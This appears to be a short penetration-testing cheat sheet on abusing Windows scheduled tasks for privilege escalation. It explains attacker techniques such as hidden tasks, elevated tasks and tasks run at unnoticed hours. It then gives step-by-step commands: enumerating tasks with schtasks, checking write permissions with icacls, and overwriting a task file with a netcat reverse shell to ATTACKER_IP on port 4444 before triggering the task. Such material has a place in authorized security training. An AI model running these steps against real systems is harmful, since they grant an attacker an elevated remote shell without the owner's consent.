2.3 KiB
General
Task scheduling in Windows refers to the ability of the operating system to automatically run certain tasks at predefined times or intervals. Exploitation via task scheduling could refer to an attacker using this feature to schedule malicious tasks that execute code or perform actions without the user's knowledge or consent. For example, an attacker could schedule a task to run a program that downloads and installs malware on the victim's computer, or to perform some other malicious action. Task scheduling can be exploited in various ways, including by creating tasks that are hidden or that run with elevated privileges, or by scheduling tasks to run at times when the user is not likely to notice them.
-
Scheduling tasks to run at times when the user is not likely to notice them: The attacker could schedule a task to run at a time when the user is unlikely to be using the computer, such as late at night or while the user is away from the computer. This could make it more difficult for the user to notice any suspicious activity or to identify the source of any problems that may occur.
-
Creating tasks that are hidden: The attacker could create a task that is not visible to the user and that runs in the background, potentially without the user's knowledge.
-
Creating tasks that run with elevated privileges: The attacker could create a task that runs with higher privileges than the user's account, potentially allowing the task to perform actions that the user does not have permission to perform.
Commands
Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or it's using a binary you can modify.
Find all the schedued Tasks
> schtasks /query /fo list /v (ALL THE TASKS)
> schtasks /query /tn {TASK} /fo list /v (ONLY THE TASK)
Find the permision needed to edit the task file
icacls c:\tasks\{TASK NAME} (I = Inheritance) (F = Full Controle) (icacls = Tool to find permision)
type c:\tasks\{TASK NAME} (check what the task is about)
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\{TASK} (Reverce Shell)
Set the attacking machine with a netcat server ready to lisent
schtasks /run /tn {TASK} (Launch the vulnerable task or wait until it run)